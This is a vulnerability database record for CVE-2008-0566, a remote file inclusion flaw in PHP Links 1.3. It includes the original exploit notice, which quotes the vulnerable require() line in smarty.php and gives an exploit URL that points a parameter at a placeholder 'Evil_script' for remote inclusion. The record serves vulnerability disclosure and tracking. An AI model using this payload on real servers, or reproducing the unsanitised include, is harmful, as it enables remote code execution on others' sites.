Details of VAR-E-200801-0244

ID

VAR-E-200801-0244

CVE

cve_id:

CVE-2008-0566

Trust: 1.9

sources: BID: 27529 // EXPLOIT-DB: 5022 // EDBNET: 29330

EDB ID

5022

TITLE

PHP Links 1.3 - 'smarty.php' Remote File Inclusion - PHP webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 5022

DESCRIPTION

PHP Links 1.3 - 'smarty.php' Remote File Inclusion. CVE-41144CVE-2008-0566 . webapps exploit for PHP platform

Trust: 0.6

sources: EXPLOIT-DB: 5022

AFFECTED PRODUCTS

vendor:	php	model:	links	scope:	eq	version:	1.3	Trust: 1.0
vendor:	deltascripts	model:	php links	scope:	eq	version:	1.3	Trust: 0.3

sources: BID: 27529 // EXPLOIT-DB: 5022

EXPLOIT

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : Houssamix From H-T Team
= Script : PHP Links from DeltaScripts <= 1.3

= Download : http://softadmin.deltascripts.com/download.php
(PHP Links v1.3 Released 13.09.2007 )

= BUG : Remote File Inclusion Vulnerability

= Vulnerable Code : /includes/smarty.php

require($full_path_to_public_program . "/admin/libs/Smarty.class.php"); <= Line 2

= Exploit :
http://target/phplinks/includes/smarty.php?full_path_to_public_program=Evil_script

-------------------------------------------------------------
= Greetz : CoNaN - Stack-Terrorist - Gold_M - Rachidox
-------------------------------------------------------------

# milw0rm.com [2008-01-30]

Trust: 1.0

sources: EXPLOIT-DB: 5022

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 5022

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 5022

TYPE

'smarty.php' Remote File Inclusion

Trust: 1.0

sources: EXPLOIT-DB: 5022

CREDITS

Houssamix

Trust: 0.6

sources: EXPLOIT-DB: 5022

EXTERNAL IDS

db:	NVD	id:	CVE-2008-0566	Trust: 1.9
db:	EXPLOIT-DB	id:	5022	Trust: 1.6
db:	EDBNET	id:	29330	Trust: 0.6
db:	BID	id:	27529	Trust: 0.3

sources: BID: 27529 // EXPLOIT-DB: 5022 // EDBNET: 29330

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2008-0566	Trust: 1.6
url:	https://www.exploit-db.com/exploits/5022/	Trust: 0.6
url:	http://www.deltascripts.com/phplinks	Trust: 0.3

sources: BID: 27529 // EXPLOIT-DB: 5022 // EDBNET: 29330

SOURCES

db:	BID	id:	27529
db:	EXPLOIT-DB	id:	5022
db:	EDBNET	id:	29330

LAST UPDATE DATE

2022-07-27T09:36:35.989000+00:00

SOURCES UPDATE DATE

db:

BID

id:

27529

date:

2015-05-07T17:33:00

SOURCES RELEASE DATE

db:	BID	id:	27529	date:	2008-01-30T00:00:00
db:	EXPLOIT-DB	id:	5022	date:	2008-01-30T00:00:00
db:	EDBNET	id:	29330	date:	2008-01-30T00:00:00